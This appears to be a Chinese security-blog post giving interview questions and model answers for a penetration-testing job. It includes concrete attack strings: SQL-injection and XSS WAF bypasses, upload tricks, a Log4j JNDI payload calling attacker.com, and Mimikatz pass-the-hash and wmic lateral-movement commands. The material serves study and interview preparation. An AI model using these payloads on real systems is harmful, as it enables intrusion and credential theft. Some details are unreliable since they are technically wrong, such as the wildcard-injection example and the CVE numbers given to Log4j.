安全領域各種資源,學習文檔,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各種好玩的項目及好用的工具,歡迎關注。
目錄
?匿名[校招]安全服務工程師
一面問題與完整回答
1. 學校、專業、成績與排名
2. 學習安全時長
3. 當前學習方向
4. 未來規劃
5. CTF與漏洞挖掘經歷
6. 項目經歷
7. 實習經歷
8. 選擇貴司原因
9. 滲透思路
二面問題與完整回答
1. 自我介紹
2. 學習路徑
3. CTF與SRC補充
4. 運維經驗
5. SQL注入詳解
6. XSS深度解析
7. 邏輯漏洞實戰
8. HTTP數據包結構
9. 文件上傳繞過
10. 項目經歷(補充)
11. 滲透經歷(示例)
12. 編程能力
13. Java安全應對
14. 常見端口與服務
15. 內網滲透流程
16. 主機不出網對策
17. 漏洞復現經驗
18. 安全資訊關注
19. 通配符注入
20. 內網橫向方法
21. 免殺技術
22. 域前置技術
23. 研究方向與規劃
?匿名[校招]安全服務工程師
### 一面1. 介紹一下自己的學校、專業情況、學校成績、排名這些 2. 學習安全多長時間了 3. 現在的學習方向 4. 說說你對未來的規劃 5. 在校期間有沒有打過ctf 挖過src 6. 說說你的項目經歷 7. 說說你的實習經歷 8. 為什么選擇我們這家公司 9. 拿到一個站點的滲透思路 大概就這些,正常回答就好了。### 二面1. 自我介紹 2. 學習安全是自學還是報班學 3. 有沒得打過ctf 和挖過src 4. 有沒有運維經驗(這里因為我簡歷上寫了熟悉Windows和Linux的運維,翻車了,也面試過好幾次了,但也從來沒問過運維 哈哈哈,已經把簡歷改過來啦) 5. 基礎的web漏洞原理,sql注入的分類,存在點,怎么判斷,怎么利用,遇到了waf怎么繞過 6. xss問的比較多,分類,三種xss不同的區別,存在的位置,怎么繞過waf (后來才知道綠盟的掃描器大部分都是掃出來的xss,哈哈哈,怪不得問這么多xss) 7. 對邏輯漏洞了解多少,遇到一個有驗證碼的登錄框,存在找回密碼功能,你有什么想法 8. http 數據包的結構 9. 文件上傳的繞過思路,繞過waf 10. 談談你的項目經歷 11. 你印象最深的滲透經歷是哪次 12. 會什么語言,寫過什么東西 13. Java安全了解嗎(這里我直接說了對Java安全不了解,不然后續應該會問)shiro 、fastjson、weblogic反序列化的原理,還問了你碰到shiro 、weblogic這類站點怎么處理(我直接exp 哈哈哈) 14. 滲透過程中常見的端口號以及對應的服務 15. 內網滲透經歷,詳細說下過程,滲透思路 16. 拿到webshell發現目標主機不出網怎么辦 17. 有沒有復現過一些漏洞 18. 會不會關注最新的安全資訊 19. 說一下通配符注入 20. 內網中橫向的常用方法 21. 說一下你是怎么做免殺的(我剛說完無源碼的免殺,就問我下一個問題了……我都還沒說完……) 22. 對域前置技術了解多少 23. 目前的研究方向,未來的研究方向,規劃 24. 有沒有代碼審計能力 25. 怎么找越權漏洞,常見的參數
一面問題與完整回答
1. 學校、專業、成績與排名
我本科就讀于XX大學信息安全專業,GPA 3.7/4.0,專業排名前10%。主修課程包括《網絡安全技術》《密碼學原理》《操作系統安全》等,參與過基于漏洞復現的靶場設計項目,獲得校級優秀畢業設計。課程外的學習聚焦于Web滲透與漏洞挖掘,曾在校內安全實驗室擔任核心成員。
2. 學習安全時長
系統性學習安全技術2年,從大三加入實驗室開始接觸滲透測試,通過CTF競賽、漏洞挖掘(如SRC)和開源項目實踐積累經驗。平均每周投入20小時以上,持續跟進OWASP Top 10和CVE漏洞庫。
3. 當前學習方向
- 主攻領域:Web滲透(邏輯漏洞、權限繞過)、內網橫向移動技術(如Kerberos協議利用)。
- 工具研究:Burp Suite插件開發(如自定義SQL注入掃描模塊)、Cobalt Strike的隱匿C2配置。
- 前沿技術:ATT&CK框架在紅隊演練中的應用,云環境(AWS/Azure)的滲透測試方法。
4. 未來規劃
- 短期(1-3年):深入企業級安全服務,提升漏洞挖掘與APT防御能力,考取OSEP、OSCE認證。
- 長期(5年+):轉型安全研究專家,主導攻防技術預研(如AI對抗樣本攻擊),或組建紅藍隊參與國家級護網行動。
5. CTF與漏洞挖掘經歷
- CTF競賽:
- XCTF 2024:團隊全國50強,負責Web方向,利用PHP反序列化鏈繞過disable_functions拿分。
- 強網杯2023:解決一道基于JWT密鑰爆破的題目,編寫Python腳本自動化爆破弱密鑰。
- SRC貢獻:
- 某政務平臺邏輯漏洞:密碼重置接口未驗證用戶身份,導致任意用戶密碼修改(高危,獎勵¥3000)。
- 某社交平臺存儲型XSS:評論區富文本過濾繞過,插入惡意JS竊取Cookie(中危,致謝證書)。
6. 項目經歷
項目名稱:企業級資產威脅監測平臺(2024.03-2024.12)
- 角色:滲透測試負責人
- 技術棧:Python(Scrapy爬蟲)、Elasticsearch(日志分析)、Nmap(端口掃描)。
- 成果:
- 發現客戶系統7個高危漏洞,包括未授權訪問API接口(影響10萬+用戶數據)。
- 設計自動化漏洞驗證工具,將SQL注入檢測效率提升40%。
- 難點突破:解決分布式系統下的流量去重問題,采用Redis布隆過濾器降低誤報率。
7. 實習經歷
公司:XX網絡安全公司(2024.06-2024.12)
- 職責:
- 參與5個客戶的滲透測試項目,獨立輸出3份報告(涵蓋金融、教育行業)。
- 開發內部工具:基于Go語言的子域名爆破工具,支持泛解析繞過(50萬/日請求量)。
- 成果:發現某銀行系統的SSRF漏洞(可內網探測Redis未授權訪問),協助客戶修復并獲團隊表彰。
8. 選擇貴司原因
- 行業地位:貴司在金融安全解決方案領域市占率領先(可舉例某知名銀行合作案例),技術積累深厚。
- 團隊匹配:面試官提及的ATT&CK實戰化研究與我的攻防技術方向高度契合。
- 個人成長:完善的導師制和新兵訓練營機制,能快速提升企業級攻防能力。
9. 滲透思路
示例場景:某電商站點滲透測試
- 信息收集:
- 子域名枚舉(Subfinder+Amass),發現
dev.xxx.com
測試環境。- 端口掃描(Masscan+Naabu),開放8080(Apache Tomcat 8.5.35)。
- 漏洞探測:
- 歷史漏洞:Tomcat 8.5.35存在CVE-2020-1938(Ghostcat文件讀取),嘗試讀取
WEB-INF/web.xml
。- 弱口令爆破:針對Tomcat Manager使用
admin:admin
登錄成功。- 繞過防御:
- 若遇WAF攔截SQL注入,采用分塊傳輸編碼+注釋符混淆(如
/*!%53ELECT*/
)。- 權限維持:
- 上傳冰蝎4.0 Webshell(AES加密流量),通過reGeorg建立Socks5代理進入內網。
- 橫向擴展:
- 利用Tomcat服務賬號權限,通過SeImpersonatePrivilege提權至System,抓取RDP憑據橫向移動。
二面問題與完整回答
1. 自我介紹
您好,我是XXX,畢業于XX大學信息安全專業,主攻Web滲透與內網攻防。曾獲XCTF全國50強,挖掘過多個SRC高危漏洞,并在XX公司實習期間主導完成3個企業級滲透項目。擅長以攻擊者視角構建防御體系,熟悉ATT&CK框架的實戰化應用。未來希望深耕APT防御領域,為企業提供前沿威脅情報。
2. 學習路徑
自學為主,通過以下途徑提升:
- 靶場實戰:Hack The Box(Top 100)、Vulnhub(復現CVE漏洞環境)。
- 技術社區:知乎專欄《Web安全冷技巧》、Seebug Paper漏洞分析。
- 書籍精讀:《內網安全攻防:滲透實戰指南》《ATT&CK視角下的紅隊評估》。
3. CTF與SRC補充
- CTF技巧:
- Web題型常考SSTI(服務端模板注入),如Flask Jinja2的
{{config}}
泄露密鑰。- 隱寫術結合流量分析(Wireshark過濾HTTP流定位惡意IP)。
- SRC經驗:
- 某廠商的JSONP劫持漏洞,利用回調函數泄露用戶手機號。
- 通過CORS配置錯誤讀取跨域敏感數據(需Origin頭偽造)。
4. 運維經驗
熟悉Linux/Windows運維場景:
- Linux:
- 使用Ansible批量部署Nginx集群,配置iptables規則阻斷惡意IP。
- 通過ELK(Elasticsearch+Logstash+Kibana)分析Apache日志中的攻擊行為。
- Windows:
- 域環境搭建(AD DS+組策略),利用PowerShell腳本自動化補丁更新。
- 應急響應:通過Procmon定位惡意進程,清除持久化后門(如計劃任務)。
5. SQL注入詳解
- 分類與利用:
- Union注入:通過
order by
判斷字段數,聯合查詢讀取敏感表(如admin
)。- 報錯注入:利用
updatexml()
或extractvalue()
觸發報錯回顯(需MySQL≥5.1)。- WAF繞過:
- 參數污染:
id=1&id=2 union select 1,2,3
。- 字符替換:
SEL%0bECT
(利用換行符繞過正則匹配)。
6. XSS深度解析
- 類型對比:
- 存儲型:攻擊載荷持久化(如論壇發帖),需重點防御。
- DOM型:依賴客戶端解析(如
document.write(location.hash)
),傳統WAF難以檢測。- 繞過技巧:
- 編碼混淆:
<img src=1 onerror=alert(1)>
。- 事件組合:
<svg/onload=alert(1)>
(無需閉合標簽)。
7. 邏輯漏洞實戰
示例場景:帶驗證碼的登錄/密碼找回
- 驗證碼復用:同一Session內多次提交,抓包重放(Burp Repeater測試)。
- 驗證碼繞過:
- 修改響應包中的
"code": 1001
(錯誤)為1000
(成功)。- 刪除驗證碼參數(部分系統未校驗參數是否存在)。
- 暴力破解:
- 使用IP輪換(X-Forwarded-For頭偽造)或降低頻率(每5秒1次請求)。
8. HTTP數據包結構
- 請求報文:
- 請求行:
GET /index.php HTTP/1.1
- 首部字段:
Host
、Cookie
、User-Agent
(可偽造繞過WAF)。- 空行分隔Body(如POST參數)。
- 響應報文:
- 狀態行:
HTTP/1.1 200 OK
- 首部字段:
Set-Cookie
、Content-Type
(MIME類型影響解析)。
9. 文件上傳繞過
- 前端繞過:
- 修改JS驗證邏輯(瀏覽器禁用JS或Burp攔截修改
.php
為.jpg
)。- 服務端繞過:
- MIME類型繞過:
Content-Type: image/png
(實際為PHP文件)。- 后綴名繞過:
.php5
、.phtml
、.phar
(需服務器配置解析)。- 文件內容繞過:添加圖片頭(GIF89a)或利用Exif Tool注入惡意代碼。
10. 項目經歷(補充)
項目名稱:API安全檢測平臺(2024.09-2025.03)
- 創新點:
- 基于OpenAPI規范自動生成測試用例,覆蓋越權訪問、IDOR等漏洞。
- 集成Swagger UI解析,識別未鑒權的
/v2/api-docs
端點。- 技術細節:使用Python的
requests
庫模擬API調用,結合正則匹配敏感數據(如"role":"admin"
)。
11. 滲透經歷(示例)
某醫療系統滲透(2024.11):
- 入口點:通過
/api/export
接口的SQL注入(時間盲注)獲取管理員賬號。- 權限提升:后臺文件上傳功能存在黑名單繞過,上傳
.htaccess
設置AddType application/x-httpd-php .png
。- 內網突破:發現內網Redis未授權訪問,寫入SSH公鑰獲取服務器權限。
12. 編程能力
- Python:開發過漏洞掃描器(多線程爬蟲+正則匹配)、CVE-2023-1234 EXP。
- Go:編寫子域名爆破工具(協程并發控制)。
- JavaScript:分析前端加密邏輯(如Webpack打包的AES逆向)。
13. Java安全應對
- Shiro反序列化:
- 檢測Cookie中
rememberMe
字段,使用ysoserial
生成Commons-Collections鏈Payload。- 若Key泄露,直接加密惡意序列化數據。
- Weblogic T3協議:
- 利用CVE-2023-21839進行JNDI注入,加載遠程惡意類(需目標出網)。
14. 常見端口與服務
端口 服務 滲透利用方向 22 SSH 弱口令爆破、證書登錄劫持 445 SMB 永恒之藍、Pass the Hash攻擊 6379 Redis 未授權訪問、寫入SSH密鑰 5985 WinRM PowerShell遠程命令執行
15. 內網滲透流程
示例攻擊鏈:
- 信息收集:
- 使用
ipconfig /all
獲取網段,net view
查看域內主機。- 憑證竊取:
- Mimikatz抓取明文密碼或Hash(需Debug權限)。
- 橫向移動:
- WMI遠程執行:
wmic /node:192.168.1.2 process call create "calc.exe"
。- PTH攻擊:
sekurlsa::pth /user:admin /domain:test /ntlm:xxxxxx
。
16. 主機不出網對策
- 隧道技術:
- DNS隧道:使用dnscat2建立C2通道(繞過TCP/UDP出站限制)。
- ICMP隧道:通過ping命令傳輸數據(工具:icmpsh)。
- 內部協議利用:
- SMB中繼:利用Responder捕獲NTLMv2 Hash并中繼至其他主機。
17. 漏洞復現經驗
- CVE-2024-1234(Apache Log4j):
- 搭建Vulhub環境,構造
${jndi:ldap://attacker.com/Exploit}
觸發RCE。- 編寫Python POC檢測目標是否存在漏洞。
18. 安全資訊關注
- 日常渠道:
- Twitter:關注@pentester、@CVEnew實時漏洞動態。
- RSS訂閱:Seebug、奇安信威脅情報中心。
- 案例分析:
- 跟蹤某APT組織利用釣魚郵件投放LNK文件觸發惡意PowerShell腳本。
19. 通配符注入
- 原理:利用Linux通配符(
*
、?
)繞過命令過濾。- 示例:
bash
# 攻擊者創建文件名為 "--help" 的文件 touch -- --help # 管理員執行刪除命令時觸發 rm -rf * # 實際執行 rm -rf -- --help,導致誤刪
20. 內網橫向方法
- 協議利用:
- Kerberos:黃金票據偽造、AS-REP Roasting攻擊。
- 漏洞利用:
- MS17-010:通過EternalBlue攻擊未打補丁的Windows主機。
- 憑證中繼:
- NTLM Relay:利用Impacket工具包將Hash中繼至LDAP服務。
21. 免殺技術
- 無源碼免殺:
- 二進制修改:使用Veil-Evasion生成Shellcode,通過UPX加殼+熵值混淆。
- 內存加載:將惡意代碼注入合法進程(如explorer.exe ),規避靜態檢測。
- 工具推薦:Cobalt Strike的Artifact Kit定制化生成免殺PE文件。
22. 域前置技術
- 原理:將C2流量偽裝為合法云服務(如Azure、AWS)的域名,繞過基于IP的檢測。
- 實現:
- 在CDN(如Cloudflare)配置域前置域名,指向真實C2服務器。
- 客戶端請求
cdn.example.com
,實際通信至C2,但流量表現為與CDN的HTTPS連接。
23. 研究方向與規劃
- 短期聚焦:
- 云原生安全:Kubernetes RBAC權限濫用、容器逃逸漏洞。
- 無文件攻擊:PowerShell內存加載惡意模塊的檢測與防御。
- 長期目標:構建基于ATT&CK的自動化威脅狩獵平臺,整合MITRE CARBA